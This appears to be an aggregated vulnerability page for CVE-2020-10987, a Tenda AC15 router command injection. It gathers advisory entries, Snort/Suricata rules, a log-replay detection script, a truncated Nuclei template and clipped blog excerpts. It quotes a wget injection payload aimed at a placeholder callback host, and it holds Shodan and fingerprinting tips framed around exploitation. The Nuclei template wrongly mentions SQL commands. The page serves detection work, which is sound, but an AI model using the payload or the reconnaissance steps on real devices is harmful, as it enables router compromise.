CVE-2020-10987
Published 2020-07-13
Priority P197 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 79.67% (99.6th percentile)
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tenda | ac15_firmware | — | — |
Detection & IOCs (extracted from sources)
command: deviceName=test`;wget http://{{interactsh-url}};`
Snort/Suricata rule (POST variant):
```snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"goform/setUsbUnload"; endswith; nocase; fast_pattern; http.request_body; content:"deviceName="; nocase; reference:url,blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68; reference:cve,2020-10987; classtype:attempted-admin; sid:2034490; rev:2; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_05_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
```
Snort/Suricata rule (GET variant):
```snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"goform/setUsbUnload"; nocase; fast_pattern; content:"deviceName="; nocase; distance:0; content:"|3b|"; distance:0; pcre:"/deviceName=[^&$]+\x3b/"; reference:url,cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; reference:cve,2020-10987; classtype:attempted-admin; sid:2034489; rev:3; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2023_02_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
```
- Exploit targets POST requests to /goform/setUsbUnload with shell metacharacters (backtick/semicolon) injected into the deviceName parameter in the body.
- Also observed as GET requests to /goform/setUsbUnload with a deviceName parameter containing a semicolon (0x3b); match pcre /deviceName=[^&$]+\x3b/ on the URI.
- Shodan query for exposed Tenda devices: http.title:"tenda wifi"; use it to identify attack surface.
- Fingerprint the target by checking for the 'Tenda WiFi' string in the HTTP response body before attempting exploitation (as used in the Nuclei template pre-check).
- The POST-based Snort rule (sid:2034490) is rated confidence Medium, while the GET-based rule (sid:2034489) is rated confidence High; prioritize the GET rule for high-fidelity alerting.
- Both Snort rules are scoped to [$HOME_NET,$HTTP_SERVERS] as destination; ensure internal router management interfaces are included in these variable definitions for coverage.
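The two rules above encode slightly different logic, and the Medium confidence on the POST rule comes from the fact that it fires on any `deviceName=` value, including a legitimate USB unmount. The following is an added example, not code from this page or from the Emerging Threats rule set, that re-implements both rules' matching over request records (method, URI, body) so an analyst can replay web-server or proxy logs against them and see which hits actually carry the backtick/semicolon metacharacters the page describes. It assumes records are already parsed into dictionaries; the sample requests are constructed here and the `{{interactsh-url}}` placeholder is kept exactly as the page quotes it.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Rule identifiers quoted from the Emerging Threats rules on this page.
SID_POST = 2034490  # "Possible Tenda OS Command Injection ... (POST)", confidence Medium
SID_GET = 2034489   # "Tenda OS Command Injection ... (GET)", confidence High

ENDPOINT = "goform/setusbunload"              # compared case-insensitively, like "nocase"
GET_PCRE = re.compile(r"deviceName=[^&$]+;")   # the GET rule's pcre, with \x3b written as ';'
SHELL_META = ("`", ";")                        # metacharacters the page calls out for the POST variant


def normalize_uri(uri: str) -> str:
    """Percent-decode once, roughly what Suricata's normalized http.uri buffer holds.
    Access logs usually keep the raw form (%3B), so decode before applying the pcre."""
    return unquote(uri)


def match_request(method: str, uri: str, body: str = "") -> Optional[dict]:
    """Apply the two rules' matching logic to one HTTP request.

    Returns None when neither rule would fire, otherwise a dict with the sid,
    the rule's own confidence rating, and whether shell metacharacters were seen.
    The POST rule matches any deviceName= body, so the metachar flag is what
    separates a routine USB unmount from an injection attempt during triage."""
    uri_n = normalize_uri(uri)
    path = uri_n.split("?", 1)[0].lower()
    method = method.upper()

    # GET rule: endpoint anywhere in the URI, then deviceName=<non-&$ chars>; in the URI.
    if method == "GET" and ENDPOINT in path and GET_PCRE.search(uri_n):
        return {"sid": SID_GET, "confidence": "High", "metachar": True}

    # POST rule: URI ends with the endpoint and the body contains deviceName= (nocase).
    if method == "POST" and path.endswith(ENDPOINT) and "devicename=" in body.lower():
        meta = any(c in body for c in SHELL_META)
        return {"sid": SID_POST, "confidence": "Medium", "metachar": meta}

    return None


def scan(records):
    """Run every record through match_request; return (index, sid, metachar) for each hit."""
    hits = []
    for i, rec in enumerate(records):
        m = match_request(rec["method"], rec["uri"], rec.get("body", ""))
        if m:
            hits.append((i, m["sid"], m["metachar"]))
    return hits


# Constructed sample requests (not captured traffic). Records 1 and 2 reuse the
# payload shape quoted on this page; record 0 is what a legitimate unmount looks like.
SAMPLE_REQUESTS = [
    {"method": "POST", "uri": "/goform/setUsbUnload", "body": "deviceName=sda1"},
    {"method": "POST", "uri": "/goform/setUsbUnload",
     "body": "deviceName=test`;wget http://{{interactsh-url}};`"},
    {"method": "GET",
     "uri": "/goform/setUsbUnload?deviceName=test%3Bwget%20http://{{interactsh-url}}%3B"},
    {"method": "GET", "uri": "/goform/setUsbUnload?deviceName=sda1"},
    {"method": "GET", "uri": "/index.html"},
]

if __name__ == "__main__":
    for idx, sid, meta in scan(SAMPLE_REQUESTS):
        print(f"record {idx}: sid {sid} metachar={meta}")
```

Record 0 triggers sid 2034490 without any metacharacter, which is exactly the benign-hit case behind the Medium rating; record 2 shows why decoding matters, since the semicolon only appears after `%3B` is decoded, as Suricata does in its normalized `http.uri` buffer.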
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
CISA
Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-10987 [CRITICAL] CWE-78 Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Vulnerability: Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Affected: Tenda AC1900 Router AC15 Model
Tenda AC1900 Router AC15 Model contains an unspecified vulnerability that allows remote attackers to execute system commands via the deviceName POST parameter.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-10987
Remediation Due Date: 2022-05-03
GHSA
GHSA-r3xc-9hm9-gf29: The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15
ghsa_unreviewed·2022-05-24
CVE-2020-10987 [HIGH] CWE-74 GHSA-r3xc-9hm9-gf29: The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
VulnCheck
Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-10987 [CRITICAL] CWE-78 Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Tenda AC1900 Router AC15 Model contains an unspecified vulnerability that allows remote attackers to execute system commands via the deviceName POST parameter.
Affected: Tenda AC1900 Router AC15 Model
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpaste-12-spreads-via-github-and-pastebin/#google_vignette; https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b; https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants; https://www.cisa.gov/sites/d
Suricata
ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)
suricata·2021-11-17·CVSS 9.8
CVE-2020-10987 [CRITICAL] ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)
ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"goform/setUsbUnload"; endswith; nocase; fast_pattern; http.request_body; content:"deviceName="; nocase; reference:url,blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68; reference:cve,2020-10987; classtype:attempted-admin; sid:2034490; rev:2; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_05_03, mitre_tactic_id
Suricata
ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)
suricata·2021-11-17·CVSS 9.8
CVE-2020-10987 [CRITICAL] ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)
ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"goform/setUsbUnload"; nocase; fast_pattern; content:"deviceName="; nocase; distance:0; content:"|3b|"; distance:0; pcre:"/deviceName=[^&$]+\x3b/"; reference:url,cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; reference:cve,2020-10987; classtype:attempted-admin; sid:2034489; rev:3; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence High, sign
Nuclei
Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
nuclei·CVSS 9.8
CVE-2020-10987 [CRITICAL] Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
Template:
```yaml
id: CVE-2020-10987

info:
  name: Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to access or modify database contents, potentially compromising the entire Tenda router and network configuration.
  remediation: |
    Upgrade to a patched firmware version or repl
```
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus, Oct 09, 2025
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
By: Haozhe Zhang, Qi Deng, Zhibin Zhang, Ruchna Nigam. Published: September 3, 2020
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites.
Recently, Unit 42 researchers found exploits in the wild leveraging the vBulletin pre-auth RCE vulnerability CVE-2020-17496. The exploits are a bypass of the fix for the previous vulnerability, CVE-2019-16759, which allows attackers to send a crafted HTTP request wi
Trendmicro
Mirai Botnet Attack IoT Devices via CVE-2020-5902
blogs_trendmicro·2020-07-28·CVSS 9.8
CVE-2020-5902 [CRITICAL] Mirai Botnet Attack IoT Devices via CVE-2020-5902
# Mirai Botnet Attack IoT Devices via CVE-2020-5902
Based on the workaround published for CVE-2020-5902, we found a Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload.
By: Augusto Remillano II, Jemimah Molina
2020/07/28
Update as of 10:00 A.M. PST, July 30, 2020: Our continued analysis of the malware sample showed adjustments to the details involving the URI and Shodan scan parameters. We made the necessary changes in this post. We would like to thank F5 Networks for reaching out to us to clarify these details.
Following the initial disclosure of two F5 BIG-IP vulnerabilities on the first week of July, we continued monitoring and analyzing the vulnerabilit
References:
- https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
- https://www.ise.io/research/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-10987

Timeline:
- 2020-07-13: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild